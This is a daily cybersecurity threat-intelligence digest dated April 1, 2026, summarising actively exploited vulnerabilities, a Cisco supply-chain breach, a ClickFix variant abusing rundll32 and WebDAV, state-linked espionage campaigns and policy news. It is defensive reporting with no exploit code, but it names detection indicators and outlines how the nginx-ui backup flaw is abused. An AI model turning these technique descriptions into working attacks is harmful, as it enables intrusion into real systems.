Daily Threat Intel Digest - April 1, 2026

🔴 Critical Threats & Active Exploitation

[UPDATE] F5 BIG-IP source code breach fuels active exploitation of CVE-2025-53521
Following late-2025 disclosures that state-sponsored actors stole F5’s proprietary BIG-IP source code, CISA has added CVE-2025-53521 to the Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild. Originally classified as a 7.5-severity Denial of Service flaw during the October 2025 patch cycle, new intelligence has forced a critical reassessment: the vulnerability actually enables full unauthenticated Remote Code Execution (RCE), bumping its CVSS score to 9.8. The threat is amplified by the fact that the China-nexus threat group UNC5221 (Brickstorm) possesses stolen source code detailing other unpatched vulnerabilities across the BIG-IP Next platform. Eclypsium researchers note that network edge devices—firewalls, VPNs, and load balancers—saw an 8x increase in exploitation throughout 2025, making continuous firmware-level monitoring essential since traditional EDR agents cannot be installed on these appliances. Eclypsium analysis

[NEW] Google confirms active Chrome zero-day (CVE-2026-5281) under targeted exploitation
Google has pushed an emergency security update for Chrome desktop, patching 21 vulnerabilities including CVE-2026-5281, a high-severity use-after-free bug in the Dawn graphics component that is already being exploited in targeted attack campaigns. Successful exploitation allows attackers to achieve remote code execution simply by luring a victim to a compromised or malicious website. Users and enterprise administrators must immediately update to version 146.0.7680.177/.178 (Windows/Mac) or 146.0.7680.177 (Linux) to close the attack window. The remaining 20 high-severity patches address memory safety issues across critical browser components including the V8 JavaScript engine, WebGL, WebCodecs, and WebUSB. [Cyberpress; Canadian Centre for Cyber Security advisory; GBHackers]

[UPDATE] TeamPCP supply chain attack pivots to Cisco, ShinyHunters claims massive source code theft
The TeamPCP supply chain operation that previously backdoored the Trivy vulnerability scanner has cascaded into a major breach of Cisco’s internal development networks. The notorious ShinyHunters extortion group has claimed responsibility for stealing sensitive source code, AWS access keys, and over 300 private GitHub repositories containing code for unreleased tools—including Cisco’s AI Assistant and AI Defense technologies. The breach has downstream implications for major banks, BPO firms, and U.S. government agencies utilizing Cisco infrastructure. Cisco’s internal incident response teams have isolated compromised systems, wiped affected workstations, and enforced a mass employee credential reset. Security teams running Cisco environments should monitor for indicators of the “TeamPCP Cloud Stealer” malware and review cloud access logs for unauthorized activity tied to stolen AWS credentials. [Cyberpress; GBHackers; SANS ISC]

[NEW] ClickFix campaign evolves to bypass PowerShell monitoring via WebDAV and rundll32
Security researchers have identified a stealthy evolution in the widespread ClickFix attack methodology that bypasses traditional security defenses monitoring for malicious scripting activity. Instead of relying on PowerShell or mshta, this new variant tricks victims into executing a command via the Windows Run dialog that uses the native rundll32.exe to connect to an external server via the WebDAV mini-redirector. This technique allows the malware to load a secondary DLL loader (“SkimokKeep”) directly into memory, blending in with standard network traffic. Defenders must look beyond script monitoring to catch this activity, specifically watching for rundll32.exe loading davclnt.dll, establishing outbound connections, or using WebDAV syntax like “@80” in command-line arguments. CyberProof via Cyberpress

🎯 Threat Actor Activity & Campaigns

[UPDATE] Chinese cyberespionage group TA416 shifts focus back to European government and NATO entities
The China-nexus threat group TA416 (also tracked as Mustang Panda) has resumed aggressive targeting of European diplomatic missions and delegations to NATO and the EU following heightened geopolitical tensions over trade, rare earths exports, and the Russia-Ukraine war. Proofpoint researchers note the renewed focus began in mid-2025 immediately following the 25th EU-China summit, utilizing varied phishing lures including fake interview requests and collaboration proposals to deliver customized PlugX backdoors via DLL sideloading. Additionally, in a shift in targeting scope, the same group began targeting Middle Eastern government entities in March 2026 to gather regional intelligence on the ongoing Iranian conflict. CyberScoop

[NEW] UAC-0255 deploys AGEWHEEZE RAT across Ukrainian public and private sectors
A widespread phishing campaign tracked as UAC-0255 is actively targeting Ukrainian organizations across government, financial, medical, and educational sectors by impersonating CERT-UA. Threat actors are distributing a Go-based remote access trojan called AGEWHEEZE via password-protected archives hosted on the Files.fm service. The malware provides operators with extensive capabilities including screen streaming, keyboard/mouse emulation, clipboard interaction, and process management. CERT-UA traced the command-and-control infrastructure to an OVH-hosted server and confirmed the “CyberSerp” Telegram channel publicly claimed responsibility for the attacks. Despite the broad targeting scope, investigators assessed the campaign as largely unsuccessful. SOC Prime analysis

[NEW] Routine access and legitimate IT tools drive modern intrusions
Blackpoint Cyber’s 2026 Annual Threat Report confirms a significant shift in attacker behavior away from novel vulnerability exploitation toward the abuse of legitimate credentials and trusted administrative tools. SSL VPN abuse accounted for 32.8% of all identifiable incidents, while Remote Monitoring and Management (RMM) tool abuse—particularly ScreenConnect—appeared in 30.3% of cases. The majority of overall incident volume (57.5%) was driven by social engineering, specifically fake CAPTCHA and ClickFix-style campaigns that instruct users to paste commands into the Windows Run dialog. In cloud environments, adversaries are successfully bypassing MFA by capturing authenticated session tokens via Adversary-in-the-Middle phishing, accounting for 16% of cloud account compromises. BleepingComputer

⚠️ Vulnerabilities & Patches

[NEW] Public PoC exploit released for critical nginx-ui backup restore vulnerability
A publicly available proof-of-concept exploit significantly lowers the barrier for attacking CVE-2026-33026, a critical flaw in the nginx-ui web management interface that allows attackers to achieve arbitrary command execution on the underlying host. The vulnerability stems from a circular trust model in the application’s backup architecture where AES-CBC encryption keys and initialization vectors are exposed to the client, allowing attackers to modify backup configurations, recalculate hashes, and silently inject backdoors during the restore process. Administrators must immediately upgrade to nginx-ui version 2.3.4, which patches the flaw, and audit recent restoration activity for unauthorized configuration changes. Cyberpress

[NEW] RWC 2026 research exposes systemic private key leaks and password manager vault failures
Presentations at the Real World Cryptography Symposium have revealed systemic weaknesses in fundamental security infrastructure. GitGuardian presented research mapping 945,560 leaked private keys to 139,767 certificates via Certificate Transparency logs, demonstrating that key material escaping into public repositories is a systemic problem rather than a series of isolated incidents. Separately, security researchers demonstrated 27 distinct attacks against four major cloud-based password managers (Bitwarden, LastPass, and Dashlane) under a malicious server model, including the ability for a compromised Bitwarden server to enforce key recovery and steal plaintext passwords via favicon resolution. GitGuardian

📋 Policy & Industry News

[NEW] FBI warns of data security risks from Chinese-developed mobile applications
The U.S. Federal Bureau of Investigation has issued a formal warning advising Americans against using foreign-developed mobile applications, explicitly focusing on those created by Chinese developers due to significant data security and privacy risks. The warning aligns with broader U.S. government efforts to secure sensitive personal and corporate data from foreign intelligence collection programs operating under adversary national security laws. [SecurityWeek; BleepingComputer]

[NEW] Iran designates U.S. tech companies as “legitimate targets” amid ongoing cyber conflict
The Iranian government has issued threats against the Middle East operations of more than a dozen major U.S. technology companies, including Microsoft, Nvidia, and Google, formally labeling them “legitimate targets.” This escalation coincides with expanded operations by pro-Iranian threat groups as regional military conflicts continue, signaling an increased risk of retaliatory cyberattacks against U.S. corporate infrastructure. Security Boulevard

[NEW] Microsoft Teams introduces automatic EXIF metadata stripping
Microsoft is rolling out a significant privacy and security update for Teams that automatically strips EXIF metadata—including GPS coordinates, precise timestamps, and device model data—from all images shared within chats and channels. The feature works silently in the background, closing a passive but dangerous OSINT vector frequently exploited by threat actors for targeted social engineering. The update also includes a mandatory browser modernization requiring Teams web users to comply with ECMAScript 2022 (ES2022) standards by May 15, 2026. [Cyberpress; GBHackers]